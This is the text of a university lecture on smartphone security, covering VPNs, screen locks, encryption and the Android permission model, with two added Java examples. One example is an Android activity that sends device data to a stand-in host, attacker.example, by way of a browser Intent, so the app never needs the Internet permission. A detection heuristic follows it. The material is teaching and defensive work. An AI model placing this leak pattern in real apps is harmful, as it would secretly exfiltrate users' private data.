Slide1
Smart Phones and Tablets: Security Issues
S. Roy
Slide2
Acknowledgement
In preparing the presentation slides and the demo, I received help from:
Professor Simon Ou
Professor Gurdip Singh
Professor Eugene Vasserman
Fengguo Wei
Slide3
What is a Smart Phone?
Smart Phone = Phone + Computer + Sensors
Provides various services: phone calls, SMS, computation, storage, accessing the Internet, data download, GPS, camera, and so on.
OS: Android, iOS, Windows Mobile, BlackBerry
OS make: Google, Apple, Microsoft, BlackBerry
Device make: Samsung, Apple, HTC, BlackBerry
Popular models: Galaxy S III, iPhone 5
Connection/service providers: AT&T, Verizon, T-Mobile
Connection types: 3G, 4G, Wi-Fi, Bluetooth
Slide4
What is a Tablet?
A tablet is a specialized mobile computer with a big screen, primarily operated by touching the screen.
Used for reading books, watching videos, accessing the Internet, and so on.
Wireless connections: 3G, 4G, Wi-Fi, Bluetooth
OS: Android, iOS
Popular models: Samsung Galaxy Tab, Apple iPad
Slide5
Why Secure Smart Phones/Tablets?
These devices can do most of what a computer (e.g. a laptop) does.
Smartphones have extra features, such as GPS, phone calls, and SMS.
Smartphones/tablets probably contain a lot of personal information.
There is a real chance that we lose these devices.
A recent study shows these devices are a growing target for malware.
Smartphones and tablets need to meet the same security standards as any computer.
The security issues of a smart phone are similar to those of a tablet. So, without loss of generality, we will focus only on smart phone security in this class.
Slide6
Risks a Smart Phone Faces
The risks of insecure Wi-Fi, if the device uses an open Wi-Fi network
The risks of insecure Web browsing, if done from the device
Additional risks:
Physical vulnerability (e.g. an attacker physically capturing the phone and performing a comprehensive scan of it)
Sensitive information (GPS location, photos, contact list, etc.) leakage
Slide7
Installing a VPN Client
To reduce the risk of using a smartphone on a public Wi-Fi network, you may install a VPN client. Note that the VPN encrypts the traffic between the phone and the VPN server only; what the server forwards onward to the Internet is protected only as far as the web site itself uses HTTPS.
As an example, visit the KSU ITS website to get the instructions for installation:
Android: https://www.ksu.edu/its/security/vpn/androidinstall.html
iOS: https://www.ksu.edu/its/security/vpn/iosinstall.html
Finally, you can use your KSU eID as the username and your KSU password as the password to connect to the KSU VPN server.
Slide8
Installing the VPN App on Android: Step 1
Slide9
Installing the VPN App on Android: Step 2
Slide10
How to Start the KSU VPN Client?
Slide11
Connected to the KSU VPN Server
Slide12
Accessing the IEEE Xplore Library from any Physical Location
Slide13
Now let's do the Hands-On Activity
Search for the Cisco VPN client app in the app store, and download it to your phone.
Install it and make the proper settings so that it can connect to the KSU VPN server.
Start/run the VPN client; then securely browse web sites (e.g. Yahoo email).
Take screenshots of your activities.
Connect your phone to your computer to transfer the screenshots.
Use a "paint/photo" editing program to erase any private information present in the screenshots.
You may need to submit the screenshots while doing the homework.
Slide14
Minimize the Phone Data Loss Risk: Using a PIN or Password
A user should lock the phone screen with a numeric PIN or a password. How long/complex should this PIN be to thwart cracking in a reasonable amount of time?
Set a timeout (after this interval of inactivity the phone gets locked and the user needs to enter the PIN).
Before doing the PIN setup, ensure that your Android device has the latest updates.
Slide15
Setting Lock in an Android Device: Step 1
Navigate to your device's settings, and select Security, then select Set up screen lock.
Acknowledgement: http://xbase.ucdavis.edu/itexpress
Slide16
Setting Lock in an Android Device: Step 2
Choose one option among the available ones: a Pattern, PIN, or Password.
Slide17
Setting Lock in an Android Device: Step 3
Depending on which option you chose, you will see one of the following three screens:
Slide18
Setting Lock in an Android Device: Step 4
Return to the Security settings and set the lockout time. This feature locks your phone after it has been inactive for the length of time you choose.
Slide19
Setting Lock in an iOS Device: Step 1
To set a passcode, navigate through the following: Settings > General > Passcode Lock > Turn Passcode On.
Acknowledgement: http://xbase.ucdavis.edu/itexpress
Slide20
Setting Lock in an iOS Device: Step 2
Enter a four-digit passcode twice and then return to the Passcode Lock settings page.
Acknowledgement: http://xbase.ucdavis.edu/itexpress
Slide21
Setting Lock in an iOS Device: Step 3
You can create a more complex passcode with spaces and alphanumeric characters, not just numbers.
You can also change the Require Passcode timing. This feature locks your phone after it has been inactive for the length of time you choose.
At this location you can also enable the Erase Data feature, which will wipe your personal information from your phone after 10 failed passcode attempts.
Acknowledgement: http://xbase.ucdavis.edu/itexpress
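As an added worked example, not part of the original slides, the following Java class answers the question posed on the PIN slide (how long a PIN must be to thwart cracking) and puts a number on the Erase Data limit above. It assumes a 10-symbol alphabet for numeric PINs and a 63-symbol alphabet (digits, upper- and lower-case letters, space) for the complex passcode; the two guessing rates are illustrative assumptions, not figures from the slides.

```java
import java.math.BigInteger;

/**
 * Added example: estimate the strength of a lock-screen PIN/passcode.
 * Alphabet sizes and attempt rates are assumptions for illustration.
 */
public class PinStrength {
    static final int DIGITS = 10;          // numeric PIN: 0-9
    static final int ALPHANUMERIC = 63;    // assumed: 0-9, a-z, A-Z, space

    /** Number of possible codes of the given length over an alphabet of the given size. */
    static BigInteger keyspace(int alphabetSize, int length) {
        return BigInteger.valueOf(alphabetSize).pow(length);
    }

    /** Expected seconds to hit the code by exhaustive guessing (on average, half the keyspace). */
    static double expectedSecondsToCrack(int alphabetSize, int length, double attemptsPerSecond) {
        return keyspace(alphabetSize, length).doubleValue() / 2.0 / attemptsPerSecond;
    }

    /**
     * Probability that an attacker who gets at most maxAttempts guesses
     * (e.g. iOS Erase Data after 10 failures) finds a uniformly random code.
     */
    static double guessProbabilityWithLockout(int alphabetSize, int length, int maxAttempts) {
        BigInteger space = keyspace(alphabetSize, length);
        if (BigInteger.valueOf(maxAttempts).compareTo(space) >= 0) return 1.0;
        return (double) maxAttempts / space.doubleValue();
    }

    public static void main(String[] args) {
        // Assumed rates: a person typing guesses on the lock screen, versus an
        // automated offline attack on a copy of the storage, where no OS lockout applies.
        double humanRate = 1.0 / 3.0;      // one guess every 3 seconds (assumption)
        double offlineRate = 1_000_000;    // a million guesses per second (assumption)

        for (int len : new int[]{4, 6, 8}) {
            System.out.printf("%d-digit PIN: keyspace %s, ~%.0f s by hand, ~%.4f s offline, p(10 tries)=%.5f%n",
                len, keyspace(DIGITS, len),
                expectedSecondsToCrack(DIGITS, len, humanRate),
                expectedSecondsToCrack(DIGITS, len, offlineRate),
                guessProbabilityWithLockout(DIGITS, len, 10));
        }
        for (int len : new int[]{6, 8, 10}) {
            System.out.printf("%d-char alphanumeric passcode: keyspace %s, ~%.1f days offline%n",
                len, keyspace(ALPHANUMERIC, len),
                expectedSecondsToCrack(ALPHANUMERIC, len, offlineRate) / 86400);
        }
    }
}
```

The two halves of the output make the point of both slides: with the on-device lockout in force, even a 4-digit PIN gives the thief only a 10/10000 = 0.1% chance in the 10 tries allowed, so the wipe limit, not the length, is doing the work. The lockout does not help once the attacker works offline on an extracted copy of the data, which is the case to worry about when the stored data is encrypted with a key derived only from the passcode (the encryption slide below); there only the length and the alphabet matter, and a short numeric PIN falls in well under a second.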
Slide22
Unlocking an iOS Device
Your iOS device should require your passcode to unlock once the screen has been off for the specified Require Passcode time.
Acknowledgement: http://xbase.ucdavis.edu/itexpress
Slide23
Further Improvement on Security
Back up the data on the device to be sure the data can be recovered.
Turn off unused services, if any, such as Wi-Fi, Bluetooth or VPN:
unused services could expose your device to unwelcome remote connections;
turning off unused services can also prolong the device's battery life.
Label the device with minimal contact information, such as an email address or office phone number.
If you lose the device, report the loss to the police.
Slide24
Encryption and Remote Wipe Options
An iPhone (and an Android phone) can encrypt all the stored data using the user's passcode: use the feature available on your smartphone, or consider using a reputable data encryption app.
You may protect yourself for when you lose a mobile device by using the "remote wipe" feature, which can work via a Microsoft Exchange server; but the benefit of the "remote wipe" feature is debatable, since the wipe command is only acted on if the lost device comes back online, and a thief who keeps it offline never receives it.
Slide25
How an App can Exploit the Security Model
An example with Android:
The user installs a third-party app P from the Android market.
P does not request the "Internet" permission at installation time, so the user does not suspect P.
Later, P sends a request (called an Intent) to the standard "browser" app to open an Internet connection on behalf of P.
Thus P exploits the permission model and can harm the user (e.g. by leaking the user's sensitive information to the outside, encoded in the URL it asks the browser to open).
Mitigation:
The Android market, or you, should have a tool for rigorous vetting of an app before the user installs/uses it.
The user should think twice before granting critical permissions during app installation.
We should always upgrade the apps and the system.
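The following Android (Java) code is added here as an illustration of the pattern described above and is not taken from the slides: an app with no INTERNET permission hands a URL to the browser through an ACTION_VIEW Intent, and the browser, which does hold INTERNET, makes the request. The host attacker.example, the secret string and the ExfilChecker heuristic are assumptions made for the example; Intent, Uri and startActivity are the real Android APIs, so the block needs the Android SDK to build.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

/**
 * Added example (not from the slides): app P leaks data through the browser
 * without holding the INTERNET permission itself. P's AndroidManifest.xml
 * declares no <uses-permission android:name="android.permission.INTERNET"/>.
 */
public class LeakyActivity extends Activity {
    // Hypothetical collector endpoint; a placeholder for the example.
    private static final String COLLECTOR = "http://attacker.example/collect";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // Assumed payload: whatever P is able to read on the device.
        String secret = "contact list or location gathered by P";
        leakViaBrowser(secret);
    }

    /** Encodes the data in a URL and asks the default browser to fetch it on P's behalf. */
    void leakViaBrowser(String data) {
        Uri target = Uri.parse(COLLECTOR).buildUpon()
                .appendQueryParameter("d", data)   // URL-encodes the payload into the query string
                .build();
        Intent intent = new Intent(Intent.ACTION_VIEW, target);
        // No INTERNET permission is checked here: the browser that resolves the
        // Intent holds the permission, and it is the one that opens the socket.
        startActivity(intent);
    }
}

/**
 * Assumed vetting heuristic, of the kind a market or an analysis tool could
 * apply: flag an outgoing ACTION_VIEW to an http(s) URL that carries a query
 * string when the sending app's manifest does not request INTERNET.
 */
class ExfilChecker {
    static boolean looksLikeExfiltration(Intent intent, boolean appHasInternetPermission) {
        if (appHasInternetPermission) return false;
        if (!Intent.ACTION_VIEW.equals(intent.getAction())) return false;
        Uri uri = intent.getData();
        if (uri == null) return false;
        String scheme = uri.getScheme();
        boolean web = "http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme);
        return web && uri.getQuery() != null && !uri.getQuery().isEmpty();
    }
}
```

The heuristic is deliberately crude (a legitimate app may open a search URL with a query string), and a real vetting tool would instead track where the query value comes from, that is, whether it flows from a sensitive source such as the contact list or the GPS location into the Intent. The point the example makes is that the permission that matters is the browser's, not P's, which is why the install-time "all or nothing" permission list on its own does not tell the user whether an app can reach the network.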
Slide26
Comparing the Security Model of Android and iPhone (iOS)
Android allows anybody to develop an app and make it available in the market with a minimal vetting process; on the other hand, Apple claims to rigorously vet a third-party app before it goes into the App Store.
The user grants permissions to an Android app at installation time (an all-or-nothing permission policy) and there is no run-time monitoring.
iOS may ask the user for permission at run time (and an app can run with a partial permission set).
Slide27
Managing the Phone Settings
In the default setting, numerous apps start themselves automatically on a smart phone. The user needs to be informed of this.
As an example, on an Android phone all Google apps (Gmail, Google Plus, etc.) are always ON by default.
The user needs to modify the settings to securely manage the apps: email apps, social network apps, messaging apps, etc.
Slide28
Summary
We discussed common security issues of smart phones/tablets.
We presented a few standard countermeasures to mitigate the risks.
Reminder: the next homework is due before the next class (1pm on March 7).
The next class will be held in Room 128.